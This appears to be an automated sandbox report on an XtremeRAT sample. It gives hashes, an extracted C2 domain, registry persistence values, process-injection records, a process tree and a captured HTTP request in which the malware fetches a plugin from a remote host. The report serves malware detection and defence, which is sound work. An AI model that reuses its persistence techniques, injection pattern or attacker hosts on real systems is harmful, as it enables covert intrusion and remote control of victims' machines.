Analysis

- max time kernel: 146s
- max time network: 147s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 08-12-2024 10:29
Static task: static1

Behavioral task: behavioral1
- Sample: d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe
- Resource: win7-20240708-en

Behavioral task: behavioral2
- Sample: d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe
- Resource: win10v2004-20241007-en
General

- Target: d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe
- Size: 699KB
- MD5: d69477dcdd44d6f9d0102329894a9d9c
- SHA1: 123ee34e12767a0a5fbbf132a32321cdf3dbbae0
- SHA256: ef9ec4742f12bf579efb7d36c3d645fba6d67b91272ee5b34952c25184f0afd6
- SHA512: 5b92c34293bdbad140450ed4732710ab9b5a4d25f45034f8a754cfb0bd55d7b24059c46cc8465786283a5124b88cc154d0840205023119271334dc0058a0781f
- SSDEEP: 12288:q/ezny90hw8BFyqXTS1jMeo5DKI4EZNYbaDY9wL:lnyww8BFyqjSMb4aNnMW
Malware Config

Extracted
- Family: xtremerat
- C2: dejoui2.no-ip.info
Signatures

Detect XtremeRAT payload (5 IoCs)

| resource | yara_rule |
| --- | --- |
| behavioral1/memory/2732-29-0x0000000000C80000-0x0000000000CAD000-memory.dmp | family_xtremerat |
| behavioral1/memory/2732-28-0x0000000000C80000-0x0000000000CAD000-memory.dmp | family_xtremerat |
| behavioral1/memory/1908-44-0x0000000000C80000-0x0000000000CAD000-memory.dmp | family_xtremerat |
| behavioral1/memory/2732-48-0x0000000000C80000-0x0000000000CAD000-memory.dmp | family_xtremerat |
| behavioral1/memory/2732-49-0x0000000000C80000-0x0000000000CAD000-memory.dmp | family_xtremerat |
XtremeRAT
XtremeRAT was developed by xtremecoder, is written in Delphi, and has been available since at least 2010.

Xtremerat family
Boot or Logon Autostart Execution: Active Setup (2 TTPs, 4 IoCs)
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2} | jk27ca.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2}\StubPath = "C:\\Windows\\InstallDir\\explor.exe restart" | jk27ca.exe |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2} | svchost.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2}\StubPath = "C:\\Windows\\InstallDir\\explor.exe restart" | svchost.exe |
Executes dropped EXE (3 IoCs)

| pid | Process |
| --- | --- |
| 2368 | jk27ca.exe |
| 2732 | jk27ca.exe |
| 2844 | BOOSTH~1.EXE |
Loads dropped DLL (7 IoCs)

| pid | Process |
| --- | --- |
| 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe |
| 2368 | jk27ca.exe |
| 2368 | jk27ca.exe |
| 2368 | jk27ca.exe |
| 2732 | jk27ca.exe |
| 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe |
| 2844 | BOOSTH~1.EXE |
Adds Run key to start application (2 TTPs, 5 IoCs)

| description | ioc | Process |
| --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\HKCU = "C:\\Windows\\InstallDir\\explor.exe" | svchost.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\HKLM = "C:\\Windows\\InstallDir\\explor.exe" | jk27ca.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\HKCU = "C:\\Windows\\InstallDir\\explor.exe" | jk27ca.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\HKLM = "C:\\Windows\\InstallDir\\explor.exe" | svchost.exe |
Suspicious use of SetThreadContext (1 IoCs)

| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 2368 set thread context of 2732 | 2368 | jk27ca.exe | 32 |

| resource | yara_rule |
| --- | --- |
| behavioral1/memory/2732-16-0x0000000000C80000-0x0000000000CAD000-memory.dmp | upx |
| behavioral1/memory/2732-17-0x0000000000C80000-0x0000000000CAD000-memory.dmp | upx |
| behavioral1/memory/2732-29-0x0000000000C80000-0x0000000000CAD000-memory.dmp | upx |
| behavioral1/memory/2732-28-0x0000000000C80000-0x0000000000CAD000-memory.dmp | upx |
| behavioral1/memory/2732-27-0x0000000000C80000-0x0000000000CAD000-memory.dmp | upx |
| behavioral1/memory/2732-24-0x0000000000C80000-0x0000000000CAD000-memory.dmp | upx |
| behavioral1/memory/2732-21-0x0000000000C80000-0x0000000000CAD000-memory.dmp | upx |
| behavioral1/memory/1908-44-0x0000000000C80000-0x0000000000CAD000-memory.dmp | upx |
| behavioral1/memory/2732-48-0x0000000000C80000-0x0000000000CAD000-memory.dmp | upx |
| behavioral1/memory/2732-49-0x0000000000C80000-0x0000000000CAD000-memory.dmp | upx |
Drops file in Windows directory (3 IoCs)

| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | C:\Windows\InstallDir\explor.exe | jk27ca.exe |
| File created | C:\Windows\InstallDir\explor.exe | jk27ca.exe |
| File opened for modification | C:\Windows\InstallDir\ | jk27ca.exe |
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | BOOSTH~1.EXE |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svchost.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | jk27ca.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | jk27ca.exe |
Suspicious use of AdjustPrivilegeToken (1 IoCs)

| description | pid | Process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 2368 | jk27ca.exe |
Suspicious use of SetWindowsHookEx (1 IoCs)

| pid | Process |
| --- | --- |
| 2732 | jk27ca.exe |
Suspicious use of WriteProcessMemory (64 IoCs)

| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 2020 wrote to memory of 2368 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 30 |
| PID 2020 wrote to memory of 2368 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 30 |
| PID 2020 wrote to memory of 2368 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 30 |
| PID 2020 wrote to memory of 2368 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 30 |
| PID 2020 wrote to memory of 2368 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 30 |
| PID 2020 wrote to memory of 2368 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 30 |
| PID 2020 wrote to memory of 2368 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 30 |
| PID 2368 wrote to memory of 2668 | 2368 | jk27ca.exe | 31 |
| PID 2368 wrote to memory of 2668 | 2368 | jk27ca.exe | 31 |
| PID 2368 wrote to memory of 2668 | 2368 | jk27ca.exe | 31 |
| PID 2368 wrote to memory of 2668 | 2368 | jk27ca.exe | 31 |
| PID 2368 wrote to memory of 2668 | 2368 | jk27ca.exe | 31 |
| PID 2368 wrote to memory of 2668 | 2368 | jk27ca.exe | 31 |
| PID 2368 wrote to memory of 2668 | 2368 | jk27ca.exe | 31 |
| PID 2368 wrote to memory of 2732 | 2368 | jk27ca.exe | 32 |
| PID 2368 wrote to memory of 2732 | 2368 | jk27ca.exe | 32 |
| PID 2368 wrote to memory of 2732 | 2368 | jk27ca.exe | 32 |
| PID 2368 wrote to memory of 2732 | 2368 | jk27ca.exe | 32 |
| PID 2368 wrote to memory of 2732 | 2368 | jk27ca.exe | 32 |
| PID 2368 wrote to memory of 2732 | 2368 | jk27ca.exe | 32 |
| PID 2368 wrote to memory of 2732 | 2368 | jk27ca.exe | 32 |
| PID 2368 wrote to memory of 2732 | 2368 | jk27ca.exe | 32 |
| PID 2368 wrote to memory of 2732 | 2368 | jk27ca.exe | 32 |
| PID 2368 wrote to memory of 2732 | 2368 | jk27ca.exe | 32 |
| PID 2368 wrote to memory of 2732 | 2368 | jk27ca.exe | 32 |
| PID 2732 wrote to memory of 1908 | 2732 | jk27ca.exe | 33 |
| PID 2732 wrote to memory of 1908 | 2732 | jk27ca.exe | 33 |
| PID 2732 wrote to memory of 1908 | 2732 | jk27ca.exe | 33 |
| PID 2732 wrote to memory of 1908 | 2732 | jk27ca.exe | 33 |
| PID 2732 wrote to memory of 1908 | 2732 | jk27ca.exe | 33 |
| PID 2732 wrote to memory of 1908 | 2732 | jk27ca.exe | 33 |
| PID 2732 wrote to memory of 1908 | 2732 | jk27ca.exe | 33 |
| PID 2020 wrote to memory of 2844 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 34 |
| PID 2020 wrote to memory of 2844 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 34 |
| PID 2020 wrote to memory of 2844 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 34 |
| PID 2020 wrote to memory of 2844 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 34 |
| PID 2020 wrote to memory of 2844 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 34 |
| PID 2020 wrote to memory of 2844 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 34 |
| PID 2020 wrote to memory of 2844 | 2020 | d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe | 34 |
| PID 2732 wrote to memory of 1908 | 2732 | jk27ca.exe | 33 |
| PID 2732 wrote to memory of 2632 | 2732 | jk27ca.exe | 35 |
| PID 2732 wrote to memory of 2632 | 2732 | jk27ca.exe | 35 |
| PID 2732 wrote to memory of 2632 | 2732 | jk27ca.exe | 35 |
| PID 2732 wrote to memory of 2632 | 2732 | jk27ca.exe | 35 |
| PID 2732 wrote to memory of 2632 | 2732 | jk27ca.exe | 35 |
| PID 2732 wrote to memory of 2632 | 2732 | jk27ca.exe | 35 |
| PID 2732 wrote to memory of 2632 | 2732 | jk27ca.exe | 35 |
| PID 2732 wrote to memory of 2512 | 2732 | jk27ca.exe | 36 |
| PID 2732 wrote to memory of 2512 | 2732 | jk27ca.exe | 36 |
| PID 2732 wrote to memory of 2512 | 2732 | jk27ca.exe | 36 |
| PID 2732 wrote to memory of 2512 | 2732 | jk27ca.exe | 36 |
| PID 2732 wrote to memory of 2512 | 2732 | jk27ca.exe | 36 |
| PID 2732 wrote to memory of 2512 | 2732 | jk27ca.exe | 36 |
| PID 2732 wrote to memory of 2512 | 2732 | jk27ca.exe | 36 |
| PID 2732 wrote to memory of 2560 | 2732 | jk27ca.exe | 37 |
| PID 2732 wrote to memory of 2560 | 2732 | jk27ca.exe | 37 |
| PID 2732 wrote to memory of 2560 | 2732 | jk27ca.exe | 37 |
| PID 2732 wrote to memory of 2560 | 2732 | jk27ca.exe | 37 |
| PID 2732 wrote to memory of 2560 | 2732 | jk27ca.exe | 37 |
| PID 2732 wrote to memory of 2560 | 2732 | jk27ca.exe | 37 |
| PID 2732 wrote to memory of 2560 | 2732 | jk27ca.exe | 37 |
| PID 2732 wrote to memory of 2568 | 2732 | jk27ca.exe | 38 |
| PID 2732 wrote to memory of 2568 | 2732 | jk27ca.exe | 38 |
| PID 2732 wrote to memory of 2568 | 2732 | jk27ca.exe | 38 |
Processes

C:\Users\Admin\AppData\Local\Temp\d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe"
    PID: 2020
    - Loads dropped DLL
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\jk27ca.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\jk27ca.exe
        PID: 2368
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\jk27ca.exe
            Command line: jk27ca.exe
            PID: 2668

        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\jk27ca.exe
            Command line: jk27ca.exe
            PID: 2732
            - Boot or Logon Autostart Execution: Active Setup
            - Executes dropped EXE
            - Loads dropped DLL
            - Adds Run key to start application
            - Drops file in Windows directory
            - System Location Discovery: System Language Discovery
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\svchost.exe
                Command line: svchost.exe
                PID: 1908
                - Boot or Logon Autostart Execution: Active Setup
                - Adds Run key to start application
                - System Location Discovery: System Language Discovery

            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 2632
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 2512
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 2560
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 2568
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 2592
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 2640
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 3052
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 2088
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 2576
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 2372
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 1676
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 3060
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 760
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 2768
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 1264
            C:\Windows\SysWOW64\explorer.exe (command line: explorer.exe), PID: 1472

    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BOOSTH~1.EXE
        Command line: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BOOSTH~1.EXE
        PID: 2844
        - Executes dropped EXE
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
Network

DNS, remote address 8.8.8.8:53
    Request: thetradingeye.com IN A
    Response: thetradingeye.com IN A 193.26.158.183

HTTP, remote address 193.26.158.183:80 (28 exchanges; the request and the response are identical in every exchange except for the response Date header, so the first exchange is shown in full and the remaining response dates are listed below it)

Request:
GET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive

Response:
HTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:29:43 GMT
Content-Length: 19

Response Date headers of the remaining 27 exchanges (all Sun, 08 Dec 2024, GMT):
10:29:48, 10:29:54, 10:29:59, 10:30:04, 10:30:09, 10:30:14, 10:30:19, 10:30:24, 10:30:29, 10:30:35, 10:30:40, 10:30:45, 10:30:50, 10:30:55, 10:31:00, 10:31:05, 10:31:10, 10:31:16, 10:31:21, 10:31:26, 10:31:31, 10:31:37, 10:31:42, 10:31:47, 10:31:52, 10:31:57, 10:32:02

DNS, remote address 8.8.8.8:53
    Request: dejoui2.no-ip.info IN A
    Response: dejoui2.no-ip.info IN A 0.0.0.0
12.0kB 6.2kB 59 32
MITRE ATT&CK Enterprise v15

- Persistence
  - Boot or Logon Autostart Execution (2)
    - Active Setup (1)
    - Registry Run Keys / Startup Folder (1)
- Privilege Escalation
  - Boot or Logon Autostart Execution (2)
    - Active Setup (1)
    - Registry Run Keys / Startup Folder (1)
Downloads

- Filesize: 467KB
- MD5: 0715c843b7a3251e30b1032441b72a16
- SHA1: 8200877a5671f14accec609d62f5a481b8dec598
- SHA256: 24db9327aa259fb2b7ce9bde4a56c1abc7ca545637b1b9bd117221943957a311
- SHA512: e681dbbcfd7516860deb685eb2d368f431aa2ecddd078e1350dd06b6d808cf15041e7307d1f5ea520770b0489fd6105979d2266f27adb7ad58cdde6ef832d271

- Filesize: 197KB
- MD5: 29e01606b4f35126333767f1fd7712fe
- SHA1: 25699a15402be8674f6a04592e51c3a1bffd2805
- SHA256: 05129e5a49b13ec8e8f0098c927fbaf8b8b19a38e65aef20773d56f2c734833f
- SHA512: dfd3eca7cdfe7b97d12882e192ad85a57da938a5761a44d07aa85b386a0a4b20655c823341cb82b78585f1996ca3be9d8c7843e4a3fc9c132b1f56992ba1a405